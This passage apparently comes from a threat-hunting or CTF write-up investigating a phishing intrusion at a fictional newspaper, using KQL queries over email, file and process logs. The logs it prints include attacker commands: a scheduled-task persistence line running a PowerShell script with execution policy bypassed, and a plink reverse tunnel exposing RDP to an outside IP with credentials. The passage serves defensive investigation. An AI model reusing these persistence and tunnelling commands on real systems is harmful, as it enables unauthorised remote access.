Most got flagged as suspicious, except--crucially--Sonia Gose's. There is a previously-unseen email address and domain: valdorias_best_recruiter@gmail.com and promotion-recruit.com; the IP address used with plink was previously confirmed to direct to promotion-hire.info, and promotionrecruit.com was from which Sonia Gose downloaded the malicious file. To check if there are any other IPs and/or domains, I run:

Email
| where sender == "newspaper_jobs@gmail.com"
or reply_to == "newspaper_jobs@gmail.com"
| extend domain = tostring(parse_url(link).Host)
| distinct domain
| lookup PassiveDns on $left.domain == $right.domain
| distinct ip

...Which returns nothing, to my surprise. The only IP address in PassiveDns is the one used with plink.

To check what other emails could've been sent from the discovered address:

Email
| where sender == "valdorias_best_recruiter@gmail.com"
or reply_to == "valdorias_best_recruiter@gmail.com"
Query Results
timestamp sender reply_to recipient subject verdict link
2024-01-03 06:39:22.0000 valdorias_best_recruiter@gmail.com valdorias_best_recruiter@gmail.com ida_tarbell@valdoriantimes.news [EXTERNAL] Exciting Career Opportunity: Senior Editor Position at Valdorian Leader SUSPICIOUS http://hirerecruit.org/search/online/published/Stop_Being_So_Broke_Get_Money_Now.docx
2024-01-03 06:39:22.0000 valdorias_best_recruiter@gmail.com valdorias_best_recruiter@gmail.com peter_parket@valdoriantimes.news [EXTERNAL] Exciting Career Opportunity: Senior Editor Position at Valdorian Leader SUSPICIOUS http://hirerecruit.org/search/online/published/Stop_Being_So_Broke_Get_Money_Now.docx
2024-01-03 06:39:22.0000 valdorias_best_recruiter@gmail.com valdorias_best_recruiter@gmail.com kathleen_hopper@valdoriantimes.news [EXTERNAL] Exciting Career Opportunity: Senior Editor Position at Valdorian Leader SUSPICIOUS http://hirerecruit.org/search/online/published/Stop_Being_So_Broke_Get_Money_Now.docx
2024-01-03 06:39:22.0000 valdorias_best_recruiter@gmail.com valdorias_best_recruiter@gmail.com nene_leaks@valdoriantimes.news [EXTERNAL] Exciting Career Opportunity: Senior Editor Position at Valdorian Leader SUSPICIOUS http://hirerecruit.org/search/online/published/Stop_Being_So_Broke_Get_Money_Now.docx
2024-01-03 06:39:22.0000 valdorias_best_recruiter@gmail.com valdorias_best_recruiter@gmail.com mark_zuckerberg@valdoriantimes.news [EXTERNAL] Exciting Career Opportunity: Senior Editor Position at Valdorian Leader SUSPICIOUS http://hirerecruit.org/search/online/published/Stop_Being_So_Broke_Get_Money_Now.docx
2024-01-03 06:39:22.0000 valdorias_best_recruiter@gmail.com valdorias_best_recruiter@gmail.com larry_page@valdoriantimes.news [EXTERNAL] Exciting Career Opportunity: Senior Editor Position at Valdorian Leader SUSPICIOUS http://hirerecruit.org/search/online/published/Stop_Being_So_Broke_Get_Money_Now.docx
2024-01-05 09:42:05.0000 valdorias_best_recruiter@gmail.com valdorias_best_recruiter@gmail.com dan_rather@valdoriantimes.news [EXTERNAL] Breaking News: We're Hiring! Apply Now for Reporter Roles CLEAN https://promotionrecruit.com/published/Valdorian_Times_Editorial_Offer_Letter.docx
2024-01-05 09:42:05.0000 valdorias_best_recruiter@gmail.com valdorias_best_recruiter@gmail.com carl_bernstein@valdoriantimes.news [EXTERNAL] Breaking News: We're Hiring! Apply Now for Reporter Roles CLEAN https://promotionrecruit.com/published/Valdorian_Times_Editorial_Offer_Letter.docx
2024-01-05 09:42:05.0000 valdorias_best_recruiter@gmail.com valdorias_best_recruiter@gmail.com barbara_walters@valdoriantimes.news [EXTERNAL] Breaking News: We're Hiring! Apply Now for Reporter Roles CLEAN https://promotionrecruit.com/published/Valdorian_Times_Editorial_Offer_Letter.docx
2024-01-05 09:42:05.0000 valdorias_best_recruiter@gmail.com valdorias_best_recruiter@gmail.com bob_woodward@valdoriantimes.news [EXTERNAL] Breaking News: We're Hiring! Apply Now for Reporter Roles CLEAN https://promotionrecruit.com/published/Valdorian_Times_Editorial_Offer_Letter.docx
2024-01-09 03:58:13.0000 valdorias_best_recruiter@gmail.com newspaper_jobs@gmail.com barbara_walters@valdoriantimes.news [EXTERNAL] RE: Invitation to Apply: Lead Political Correspondent SUSPICIOUS http://hire-recruit.info/images/online/published/Stop_Being_So_Broke_Get_Money_Now.docx
2024-01-09 03:58:13.0000 valdorias_best_recruiter@gmail.com newspaper_jobs@gmail.com bill_gates@valdoriantimes.news [EXTERNAL] RE: Invitation to Apply: Lead Political Correspondent SUSPICIOUS http://hire-recruit.info/images/online/published/Stop_Being_So_Broke_Get_Money_Now.docx
2024-01-09 03:58:13.0000 valdorias_best_recruiter@gmail.com newspaper_jobs@gmail.com tyler_byers@valdoriantimes.news [EXTERNAL] RE: Invitation to Apply: Lead Political Correspondent SUSPICIOUS http://hire-recruit.info/images/online/published/Stop_Being_So_Broke_Get_Money_Now.docx
2024-01-09 03:58:13.0000 valdorias_best_recruiter@gmail.com newspaper_jobs@gmail.com tom_brokaw@valdoriantimes.news [EXTERNAL] RE: Invitation to Apply: Lead Political Correspondent SUSPICIOUS http://hire-recruit.info/images/online/published/Stop_Being_So_Broke_Get_Money_Now.docx
2024-01-10 08:48:16.0000 valdorias_best_recruiter@gmail.com valdorias_best_recruiter@gmail.com seymour_hersh@valdoriantimes.news [EXTERNAL] Breaking News: We're Hiring! Apply Now for Reporter Roles CLEAN https://promotionrecruit.org/share/Editorial_J0b_Openings_2024.docx
2024-01-10 08:48:16.0000 valdorias_best_recruiter@gmail.com valdorias_best_recruiter@gmail.com ronnie_mclovin@valdoriantimes.news [EXTERNAL] Breaking News: We're Hiring! Apply Now for Reporter Roles CLEAN https://promotionrecruit.org/share/Editorial_J0b_Openings_2024.docx
2024-01-10 08:48:16.0000 valdorias_best_recruiter@gmail.com valdorias_best_recruiter@gmail.com seymour_hersh@valdoriantimes.news [EXTERNAL] Breaking News: We're Hiring! Apply Now for Reporter Roles CLEAN https://promotionrecruit.org/share/Editorial_J0b_Openings_2024.docx
2024-01-12 10:57:26.0000 valdorias_best_recruiter@gmail.com valdorias_best_recruiter@gmail.com craig_zimmerman@valdoriantimes.news [EXTERNAL] Join Our Team: Valdy Post Seeking Experienced Journalists CLEAN https://promotion-job.org/share/Editorial_J0b_Openings_2024.docx
2024-01-13 08:38:12.0000 newspaper_jobs@gmail.com valdorias_best_recruiter@gmail.com steve_jobs@valdoriantimes.news [EXTERNAL] RE: Invitation to Apply: Lead Political Correspondent SUSPICIOUS http://promotionrecruit.com/share/files/Valdorian_Times_Editorial_Offer_Letter.docx
2024-01-13 08:38:12.0000 newspaper_jobs@gmail.com valdorias_best_recruiter@gmail.com kenneth_but@valdoriantimes.news [EXTERNAL] RE: Invitation to Apply: Lead Political Correspondent SUSPICIOUS http://promotionrecruit.com/share/files/Valdorian_Times_Editorial_Offer_Letter.docx

There are more of the Valdorian Times staff that had been infected with the PowerShell script (see [10]), but not all of them. Note that Ronnie McLovin was contacted by the threat actors with a false job offer on 2024-01-10 at 08:48:16 in the morning. Her malicious attachment is Editorial_J0b_Openings_2024.docx

let bad_domains =
Email
| where sender == "newspaper_jobs@gmail.com"
or reply_to == "newspaper_jobs@gmail.com"
| extend domain = tostring(parse_url(link).Host)
| distinct domain;
Email
| where tostring(parse_url(link).Host) in (bad_domains)
Query Results
timestamp sender reply_to recipient subject verdict link
2024-01-04 05:16:25.0000 ida_tarbell@valdoriantimes.news ida_tarbell@valdoriantimes.news jim_mckay@valdoriantimes.news Urgent Legal Notice: Lawsuit Filed Against Valorian CLEAN https://promotionrecruit.com/modules/public/published/share/signin
2024-01-04 05:16:25.0000 ida_tarbell@valdoriantimes.news ida_tarbell@valdoriantimes.news jim_mckay@valdoriantimes.news Urgent Legal Notice: Lawsuit Filed Against Valorian CLEAN https://promotionrecruit.com/modules/public/published/share/signin
2024-01-04 05:16:25.0000 ida_tarbell@valdoriantimes.news ida_tarbell@valdoriantimes.news jim_mckay@valdoriantimes.news Urgent Legal Notice: Lawsuit Filed Against Valorian CLEAN https://promotionrecruit.com/modules/public/published/share/signin
2024-01-05 09:42:05.0000 newspaper_jobs@gmail.com newspaper_jobs@gmail.com sonia_gose@valdoriantimes.news [EXTERNAL] FW: Invitation to Apply: Lead Political Correspondent CLEAN https://promotionrecruit.com/published/Valdorian_Times_Editorial_Offer_Letter.docx
2024-01-05 09:42:05.0000 valdorias_best_recruiter@gmail.com valdorias_best_recruiter@gmail.com dan_rather@valdoriantimes.news [EXTERNAL] Breaking News: We're Hiring! Apply Now for Reporter Roles CLEAN https://promotionrecruit.com/published/Valdorian_Times_Editorial_Offer_Letter.docx
2024-01-05 09:42:05.0000 valdorias_best_recruiter@gmail.com valdorias_best_recruiter@gmail.com carl_bernstein@valdoriantimes.news [EXTERNAL] Breaking News: We're Hiring! Apply Now for Reporter Roles CLEAN https://promotionrecruit.com/published/Valdorian_Times_Editorial_Offer_Letter.docx
2024-01-05 09:42:05.0000 valdorias_best_recruiter@gmail.com valdorias_best_recruiter@gmail.com barbara_walters@valdoriantimes.news [EXTERNAL] Breaking News: We're Hiring! Apply Now for Reporter Roles CLEAN https://promotionrecruit.com/published/Valdorian_Times_Editorial_Offer_Letter.docx
2024-01-05 09:42:05.0000 valdorias_best_recruiter@gmail.com valdorias_best_recruiter@gmail.com bob_woodward@valdoriantimes.news [EXTERNAL] Breaking News: We're Hiring! Apply Now for Reporter Roles CLEAN https://promotionrecruit.com/published/Valdorian_Times_Editorial_Offer_Letter.docx
2024-01-06 03:42:39.0000 dan_rather@valdoriantimes.news dan_rather@valdoriantimes.news carl_bernstein@valdoriantimes.news Fact Check Required: Discrepancies in Recent Report. CLEAN http://promotionrecruit.com/share/public/published/auth
2024-01-06 03:42:39.0000 dan_rather@valdoriantimes.news dan_rather@valdoriantimes.news bob_woodward@valdoriantimes.news Fact Check Required: Discrepancies in Recent Report. CLEAN http://promotionrecruit.com/share/public/published/auth
2024-01-06 03:42:39.0000 dan_rather@valdoriantimes.news dan_rather@valdoriantimes.news bob_woodward@valdoriantimes.news Fact Check Required: Discrepancies in Recent Report. CLEAN http://promotionrecruit.com/share/public/published/auth
2024-01-07 09:56:06.0000 newspaper_jobs@gmail.com newspaper_jobs@gmail.com linus_torvalds@valdoriantimes.news [EXTERNAL] Your Chance to Shape the News: Current Openings in Investigative Journalism SUSPICIOUS https://promotionrecruit.com/files/public/Valdorian_Times_Editorial_Offer_Letter.docx
2024-01-08 05:16:17.0000 newspaper_jobs@gmail.com newspaper_jobs@gmail.com chad_niles@valdoriantimes.news [EXTERNAL] Seeking Talented Photojournalists for Dynamic News Coverage SUSPICIOUS http://promotion-recruit.com/files/modules/online/Valdorian_Times_Editorial_Offer_Letter.docx
2024-01-08 05:16:17.0000 newspaper_jobs@gmail.com newspaper_jobs@gmail.com tom_brokaw@valdoriantimes.news [EXTERNAL] Seeking Talented Photojournalists for Dynamic News Coverage SUSPICIOUS http://promotion-recruit.com/files/modules/online/Valdorian_Times_Editorial_Offer_Letter.docx
2024-01-09 03:58:13.0000 valdorias_best_recruiter@gmail.com newspaper_jobs@gmail.com barbara_walters@valdoriantimes.news [EXTERNAL] RE: Invitation to Apply: Lead Political Correspondent SUSPICIOUS http://hire-recruit.info/images/online/published/Stop_Being_So_Broke_Get_Money_Now.docx
2024-01-09 03:58:13.0000 valdorias_best_recruiter@gmail.com newspaper_jobs@gmail.com bill_gates@valdoriantimes.news [EXTERNAL] RE: Invitation to Apply: Lead Political Correspondent SUSPICIOUS http://hire-recruit.info/images/online/published/Stop_Being_So_Broke_Get_Money_Now.docx
2024-01-09 03:58:13.0000 valdorias_best_recruiter@gmail.com newspaper_jobs@gmail.com tyler_byers@valdoriantimes.news [EXTERNAL] RE: Invitation to Apply: Lead Political Correspondent SUSPICIOUS http://hire-recruit.info/images/online/published/Stop_Being_So_Broke_Get_Money_Now.docx
2024-01-09 03:58:13.0000 valdorias_best_recruiter@gmail.com newspaper_jobs@gmail.com tom_brokaw@valdoriantimes.news [EXTERNAL] RE: Invitation to Apply: Lead Political Correspondent SUSPICIOUS http://hire-recruit.info/images/online/published/Stop_Being_So_Broke_Get_Money_Now.docx
2024-01-09 10:44:35.0000 bill_gates@valdoriantimes.news bill_gates@valdoriantimes.news bob_costas@valdoriantimes.news Urgent Legal Notice: Lawsuit Filed Against Valorian CLEAN https://promotionrecruit.com/modules/login
2024-01-09 10:44:35.0000 bill_gates@valdoriantimes.news bill_gates@valdoriantimes.news howard_cosell@valdoriantimes.news Urgent Legal Notice: Lawsuit Filed Against Valorian CLEAN https://promotionrecruit.com/modules/login
2024-01-09 10:44:35.0000 bill_gates@valdoriantimes.news bill_gates@valdoriantimes.news bob_costas@valdoriantimes.news Urgent Legal Notice: Lawsuit Filed Against Valorian CLEAN https://promotionrecruit.com/modules/login
2024-01-10 07:02:06.0000 tyler_byers@valdoriantimes.news tyler_byers@valdoriantimes.news seymour_hersh@valdoriantimes.news Fact Check Required: Discrepancies in Recent Report. CLEAN https://hire-recruit.info/published/images/login
2024-01-10 07:02:06.0000 tyler_byers@valdoriantimes.news tyler_byers@valdoriantimes.news seymour_hersh@valdoriantimes.news Fact Check Required: Discrepancies in Recent Report. CLEAN https://hire-recruit.info/published/images/login
2024-01-10 07:02:06.0000 tyler_byers@valdoriantimes.news tyler_byers@valdoriantimes.news seymour_hersh@valdoriantimes.news Fact Check Required: Discrepancies in Recent Report. CLEAN https://hire-recruit.info/published/images/login
2024-01-11 07:58:31.0000 seymour_hersh@valdoriantimes.news seymour_hersh@valdoriantimes.news howard_cosell@valdoriantimes.news Urgent Legal Notice: Lawsuit Filed Against Valorian CLEAN https://hire-recruit.info/share/modules/public/login?language=en
2024-01-11 07:58:31.0000 seymour_hersh@valdoriantimes.news seymour_hersh@valdoriantimes.news ernie_johnson@valdoriantimes.news Urgent Legal Notice: Lawsuit Filed Against Valorian CLEAN https://hire-recruit.info/share/modules/public/login?language=en
2024-01-11 07:58:31.0000 seymour_hersh@valdoriantimes.news seymour_hersh@valdoriantimes.news howard_cosell@valdoriantimes.news Urgent Legal Notice: Lawsuit Filed Against Valorian CLEAN https://hire-recruit.info/share/modules/public/login?language=en
2024-01-13 08:38:12.0000 newspaper_jobs@gmail.com valdorias_best_recruiter@gmail.com steve_jobs@valdoriantimes.news [EXTERNAL] RE: Invitation to Apply: Lead Political Correspondent SUSPICIOUS http://promotionrecruit.com/share/files/Valdorian_Times_Editorial_Offer_Letter.docx
2024-01-13 08:38:12.0000 newspaper_jobs@gmail.com valdorias_best_recruiter@gmail.com kenneth_but@valdoriantimes.news [EXTERNAL] RE: Invitation to Apply: Lead Political Correspondent SUSPICIOUS http://promotionrecruit.com/share/files/Valdorian_Times_Editorial_Offer_Letter.docx
2024-01-13 09:55:23.0000 steve_jobs@valdoriantimes.news steve_jobs@valdoriantimes.news howard_cosell@valdoriantimes.news Urgent Legal Notice: Lawsuit Filed Against Valorian CLEAN https://hire-recruit.info/share/online/public/files/login?language=en
2024-01-13 09:55:23.0000 steve_jobs@valdoriantimes.news steve_jobs@valdoriantimes.news bob_costas@valdoriantimes.news Urgent Legal Notice: Lawsuit Filed Against Valorian CLEAN https://hire-recruit.info/share/online/public/files/login?language=en
2024-01-13 09:55:23.0000 steve_jobs@valdoriantimes.news steve_jobs@valdoriantimes.news bob_costas@valdoriantimes.news Urgent Legal Notice: Lawsuit Filed Against Valorian CLEAN https://hire-recruit.info/share/online/public/files/login?language=en

Evidently, the threat actor(s) losing interest in Sonia Gose was more of a fluke than anything. They also took over various employee email accounts and used them to send phishing pages to other Valdorian Times employees.

  • Lead Investigative Reporter Ida Tarbell (ida_tarbell@valdoriantimes.news) sends an email to Sports Reporter Jim McKay (jim_mckay@valdoriantimes.news) with the subject Urgent Legal Notice: Lawsuit Filed Against Valorian, with a link to a phishing page
  • Director of News Operations Dan Rather (dan_rather@valdoriantimes.news) sends an email to Lead Investigative Reporter Carl Bernstein (carl_bernstein@valdoriantimes.news) and Lead Investigative Reporter Bob Woodward (bob_woodward@valdoriantimes.news) with the subject Fact Check Required: Discrepancies in Recent Report, with a link to a phishing page
  • IT Specialist Bill Gates (bill_gates@valdoriantimes.news) sends an email to Sports Reporter Bob Costas (bob_costas@valdoriantimes.news) and Sports Reporter Howard Cosell (howard_cosell@valdoriantimes.news) with the subject line Urgent Legal Notice: Lawsuit Filed Against Valorian, with a link to a phishing page
  • Congressional Reporter Tyler Byers (tyler_byers@valdoriantimes.news) sends an email to Lead Investigative Reporter Seymour Hersh (seymour_hersh@valdoriantimes.news) with the subject Fact Check Required: Discrepancies in Recent Report. and a link to a phishing page
  • Lead Investigative Reporter Seymour Hersh (seymour_hersh@valdoriantimes.news) sends an email to Sports Reporter Howard Cosell (howard_cosell@valdoriantimes.news) and Sports Reporter Ernie Johnson (ernie_johnson@valdoriantimes.news) with the subject Urgent Legal Notice: Lawsuit Filed Against Valorian
  • IT Specialist Steve Jobs (steve_jobs@valdoriantimes.news) sends an email to Sports Reporter Howard Cosell (howard_cosell@valdoriantimes.news) and Sports Reporter Bob Costas (bob_costas@valdoriantimes.news) with the subject Urgent Legal Notice: Lawsuit Filed Against Valorian and a link to a phishing page

There is also a previously-unseen malicious attachment: Stop_Being_So_Broke_Get_Money_Now.docx. Both this and the "Valdorian Times Offer Letter" document exist across 18 distinct computers.

Finally, just to check what other files could've dropped the malicious PowerShell script:

FileCreationEvents
| serialize
| extend next_file = next(filename)
| where next_file endswith ".ps1"
| where filename endswith ".docx"
| sort by timestamp asc
Query Results
timestamp hostname username sha256 path filename process_name next_file
2024-01-03 07:05:35.0000 LZD4-DESKTOP mazuckerberg 47eefdc06144552978b90231acc05903f19da7dd08429a2fe5785d9c26f5f737 C:\Users\mazuckerberg\Downloads\Stop_Being_So_Broke_Get_Money_Now.docx Stop_Being_So_Broke_Get_Money_Now.docx firefox.exe hacktivist_manifesto.ps1
2024-01-03 07:11:58.0000 CORG-DESKTOP kahopper 18ffc409d889bc9e5f3d6201485a3d58b204c66f3e3a8c759fe350924733dd86 C:\Users\kahopper\Downloads\Stop_Being_So_Broke_Get_Money_Now.docx Stop_Being_So_Broke_Get_Money_Now.docx firefox.exe hacktivist_manifesto.ps1
2024-01-03 07:20:56.0000 O5HM-MACHINE idtarbell c815025508a1ba3c7b68276194cac51b62526aa09c70a7157d971a84f31c3e12 C:\Users\idtarbell\Downloads\Stop_Being_So_Broke_Get_Money_Now.docx Stop_Being_So_Broke_Get_Money_Now.docx chrome.exe hacktivist_manifesto.ps1
2024-01-03 07:22:12.0000 C0MC-MACHINE lapage c4584eee4224e73097dce14321e489418cdbb5e70eee9b648b82554a034fbb80 C:\Users\lapage\Downloads\Stop_Being_So_Broke_Get_Money_Now.docx Stop_Being_So_Broke_Get_Money_Now.docx chrome.exe hacktivist_manifesto.ps1
2024-01-03 07:34:50.0000 Q8CS-LAPTOP peparket 09ad01734509e6edde6df79aadd7b539d8bf39d5066af987fd34eecb87974a8e C:\Users\peparket\Downloads\Stop_Being_So_Broke_Get_Money_Now.docx Stop_Being_So_Broke_Get_Money_Now.docx firefox.exe hacktivist_manifesto.ps1
2024-01-03 08:48:29.0000 PPKQ-LAPTOP neleaks 04a7f37b3e4da005f46b7bd53578f9165c7fb5eeafea469a77fa4695d1aa51fc C:\Users\neleaks\Downloads\Stop_Being_So_Broke_Get_Money_Now.docx Stop_Being_So_Broke_Get_Money_Now.docx firefox.exe hacktivist_manifesto.ps1
2024-01-05 10:01:44.0000 LSL7-DESKTOP bowoodward d146844f2ccc728a41c597b539716e5f2aae21390742879937d668f0a2f6a934 C:\Users\bowoodward\Downloads\Valdorian_Times_Editorial_Offer_Letter.docx Valdorian_Times_Editorial_Offer_Letter.docx firefox.exe hacktivist_manifesto.ps1
2024-01-05 10:24:04.0000 UL0M-MACHINE sogose 60b854332e393a6a2f0015383969c3ac705126a6b7829b762057a3994967a61f C:\Users\sogose\Downloads\Valdorian_Times_Editorial_Offer_Letter.docx Valdorian_Times_Editorial_Offer_Letter.docx edge.exe hacktivist_manifesto.ps1
2024-01-05 10:36:20.0000 RBLC-LAPTOP darather 6f27b43bcbcf67b6b489ff2c3a1795ef931222abb1a24f603f382728961c6f13 C:\Users\darather\Downloads\Valdorian_Times_Editorial_Offer_Letter.docx Valdorian_Times_Editorial_Offer_Letter.docx chrome.exe hacktivist_manifesto.ps1
2024-01-08 08:05:25.0000 3FUX-MACHINE chniles fa44f5c0765426d639d7430c548fb95b41fe80da8bed2e0461f7983a68a17f5a C:\Users\chniles\Downloads\Valdorian_Times_Editorial_Offer_Letter.docx Valdorian_Times_Editorial_Offer_Letter.docx chrome.exe hacktivist_manifesto.ps1
2024-01-08 10:53:27.0000 8E37-LAPTOP litorvalds 49f0fabe89ffbf9c8f56f110db31d1f2b0961ea810179451089531e45e1284be C:\Users\litorvalds\Downloads\Valdorian_Times_Editorial_Offer_Letter.docx Valdorian_Times_Editorial_Offer_Letter.docx chrome.exe hacktivist_manifesto.ps1
2024-01-09 08:10:12.0000 ZSD1-MACHINE tobrokaw ed66f757fc7b3f929f2414a7f5ea3823feea06f1a30d98dfd5253152eb82eabe C:\Users\tobrokaw\Downloads\Stop_Being_So_Broke_Get_Money_Now.docx Stop_Being_So_Broke_Get_Money_Now.docx Edge.exe hacktivist_manifesto.ps1
2024-01-09 08:36:12.0000 1OD0-MACHINE bawalters da5edbf67dc2e9b46e95dee8c2cbacf674bdea42acedabfb63c03e68242a4dcd C:\Users\bawalters\Downloads\Stop_Being_So_Broke_Get_Money_Now.docx Stop_Being_So_Broke_Get_Money_Now.docx edge.exe hacktivist_manifesto.ps1
2024-01-09 08:52:10.0000 W4PH-DESKTOP bigates 2a2b1606666523699311e46ad1dc6677d710aae96ad03395136abd10a60db0d1 C:\Users\bigates\Downloads\Stop_Being_So_Broke_Get_Money_Now.docx Stop_Being_So_Broke_Get_Money_Now.docx firefox.exe hacktivist_manifesto.ps1
2024-01-09 09:36:13.0000 JJ2F-MACHINE tybyers 215eac85821dea858beea40e5538c89b3728a39ad84bf5c533da4585ed01e623 C:\Users\tybyers\Downloads\Stop_Being_So_Broke_Get_Money_Now.docx Stop_Being_So_Broke_Get_Money_Now.docx edge.exe hacktivist_manifesto.ps1
2024-01-10 08:55:17.0000 A37A-DESKTOP romclovin fa092856280dbddbc08d48ca996ac58eda22f1db978960c9c92ad0bd13ee197e C:\Users\romclovin\Downloads\Editorial_J0b_Openings_2024.docx Editorial_J0b_Openings_2024.docx firefox.exe hacktivist_manifesto.ps1
2024-01-10 09:03:39.0000 KOVZ-DESKTOP sehersh ecf7011bdd3fe16b6af6e35de8297ae20021dacce431a04cb692a8b363e82ca8 C:\Users\sehersh\Downloads\Editorial_J0b_Openings_2024.docx Editorial_J0b_Openings_2024.docx Edge.exe hacktivist_manifesto.ps1
2024-01-10 09:40:40.0000 KOVZ-DESKTOP sehersh 44158b15ce4d61211a6e584a77ebd4f634af5bc587f321c6de9484db0fe721ef C:\Users\sehersh\Downloads\Editorial_J0b_Openings_2024.docx Editorial_J0b_Openings_2024.docx firefox.exe hacktivist_manifesto.ps1
2024-01-12 11:39:02.0000 FQEI-LAPTOP crzimmerman 6a6d260236b9d8f5a1b77a4778cced5a9162d3fe0f874e4b8c25a11b0fc69b67 C:\Users\crzimmerman\Downloads\Editorial_J0b_Openings_2024.docx Editorial_J0b_Openings_2024.docx edge.exe hacktivist_manifesto.ps1
2024-01-15 08:53:45.0000 WOJY-LAPTOP kebut 7e1c293bf306f622e7ac450c9913511ddd2f0b1cccbb72ddf70ec86c5f43f62c C:\Users\kebut\Downloads\Valdorian_Times_Editorial_Offer_Letter.docx Valdorian_Times_Editorial_Offer_Letter.docx edge.exe hacktivist_manifesto.ps1
2024-01-15 09:37:16.0000 MVBT-MACHINE stjobs 7b51e036f215f9c87e51bd31139878c07e96916424a6d3d6972cf111fa3220ab C:\Users\stjobs\Downloads\Valdorian_Times_Editorial_Offer_Letter.docx Valdorian_Times_Editorial_Offer_Letter.docx firefox.exe hacktivist_manifesto.ps1

This matches my previous discovery of 21 distinct employee devices being infected with the PowerShell script. As a final check, I wanted to see what the Security Alerts table had flagged, if anything.

SecurityAlerts
| where * contains "Stop_Being_So_Broke_Get_Money_Now.docx"
or * contains "Valdorian_Times_Editorial_Offer_Letter.docx"
or * contains "Editorial_J0b_Openings_2024.docx"
or * contains "newspaper_jobs@gmail.com"
or * contains "valdorias_best_recruiter@gmail.com"
Query Results
timestamp alert_type severity description indicators
2024-01-05 09:59:24.0000 HOST high A suspicious file was quarantined on host 1OD0-MACHINE: Valdorian_Times_Editorial_Offer_Letter.docx [{'hostname': '1OD0-MACHINE', 'filename': 'Valdorian_Times_Editorial_Offer_Letter.docx', 'sha256': '42991c2abf947fe8e502e74c3149c98b3e954c619881e74f37e23c02321c109b'}]
2024-01-08 08:20:33.0000 HOST high A suspicious file was quarantined on host ZSD1-MACHINE: Valdorian_Times_Editorial_Offer_Letter.docx [{'hostname': 'ZSD1-MACHINE', 'filename': 'Valdorian_Times_Editorial_Offer_Letter.docx', 'sha256': 'e49b603f55f459570f9c0c7f6c76cc6b0119f28f4617cf5c2716d132f1406c16'}]

Despite there existing malicious .docx files across 21 distinct devices, only two were quarantined (the hostnames belong to two Directors of News Operations); no security alerts were raised related to the emails themselves (e.g. nobody reported them as suspicious).

Focusing back on Ronnie, we now have evidence that the threat actors have hijacked employee accounts to further steal credentials; it stands to reason that Ronnie's account and device was hijacked with the PowerShell script the purpose of planting a false, unapproved, defamatory article against an up-and-coming political candidate.

ProcessEvents
| where hostname == "A37A-DESKTOP"
and process_commandline !contains "WindowsApps"
and process_commandline !contains "Edge"
and process_commandline !contains "Chrome"
and process_commandline !contains "Firefox"
and process_commandline !contains "System32"
and process_commandline !contains "Teams"
and timestamp >= datetime(2024-01-10)
and timestamp <= datetime(2024-02-01)
Query Results
This table has been redacted; it only shows the most relevant findings, rather than the entire output of the KQL query above.
timestamp parent_process_name parent_process_hash process_commandline process_name process_hash hostname username
2024-01-10 08:55:50.0000 Explorer.exe 83e1c2993c7c14ad6b4a62aae41beb0555a00642a9088c812ac9bdcc1cab9fc9 "C:\Program Files\Microsoft Office\Office16\WINWORD.EXE" "C:\Users\romclovin\Downloads\Editorial_J0b_Openings_2024.docx" WINWORD.EXE 23883d248846d95019eeec07bb37f124218847692a2e9ba24028ccd572b4b589 A37A-DESKTOP romclovin
2024-01-10 08:55:51.0000 WINWORD.EXE b2cf56a0618bb164ddd605c3b843a823c70f55cf5c5136243325e6010c7aae19 C:\ProgramData\hacktivist_manifesto.ps1 hacktivist_manifesto.ps1 be2a5f0855f721d8f6b7042d6c50b34d6fb43e5ab77a431d91e985997c5adeff A37A-DESKTOP romclovin
2024-01-10 09:31:24.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f whoami cmd.exe 9e9cdaed6cfe1bc0eaf61a651253a1cb8b21dcafb44d125fc53efff76bb796f9 A37A-DESKTOP romclovin
2024-01-10 09:45:08.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f ipconfig cmd.exe 2671a7f4bbd9f4812429936c49606d0b88ca9d41ec3601041bc3bd24aa0b95bb A37A-DESKTOP romclovin
2024-01-10 10:16:09.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f arp -a cmd.exe 10efa5bbd1872787b3d990997142fc7058b943a2e89fd78d535bc5429d272170 A37A-DESKTOP romclovin
2024-01-10 10:26:32.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f schtasks /create /sc hourly /mo 5 /tn "Hacktivist Manifesto" /tr "powershell.exe -ExecutionPolicy Bypass -File C:\ProgramData\hacktivist_manifesto.ps1" schtasks.exe 6261ac0b3243e500a91444ffdca7a434bda847c82c54c27cee887e7713687883 A37A-DESKTOP romclovin
2024-01-10 10:35:46.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f tasklist /svc cmd.exe 84d82a381f558bd4ed20e29965dc179af23fff2f69cfb34ba675124c267e91b8 A37A-DESKTOP romclovin
2024-01-10 10:46:10.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f net view cmd.exe 22630f3fcc4c805374afdb489bca0686b6d4d55c116c216424edb416f38fa0ab A37A-DESKTOP romclovin
2024-01-10 11:13:21.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f powershell.exe -ExecutionPolicy Bypass -File C:\ProgramData\hacktivist_manifesto.ps1 powershell.exe ff9136f9fe45d71bc5f4117b20b08e4ae8223e3b2c9867829200d0076d0e392c A37A-DESKTOP romclovin
2024-01-11 03:08:12.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f plink.exe -R 3389:localhost:3389 -ssh -l $had0w -pw thruthW!llS3tUfree 168.57.191.100 cmd.exe 68c24146c391b8c62cd9309d2898c3ee7c86ee6a3171b35c76cab3dc4b68afe6 A37A-DESKTOP romclovin
2024-01-31 10:26:20.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f move C:\Users\romclovin\Downloads\fakestory.docx C:\Users\romclovin\Documents\OpEdFinal_to_print.docx cmd.exe 24713a1129b719e9af97f7eeab6fb7f9e4aa94f162493a8b4e069df1f03a66da A37A-DESKTOP romclovin

Evidently, after obtaining hands-on-keyboard access to Ronnie's device, they proceeded to download a file named fakestory.docx, renamed it to OpEdFinal_to_print.docx and sent it to Clark Kent. A fellow investigator reports that the strange file was seen being downloaded by Ronnie's computer.

Employees
| where name == "Ronnie McLovin"
| distinct ip_addr
| lookup OutboundNetworkEvents on $left.ip_addr == $right.src_ip
| where tostring(parse_path(
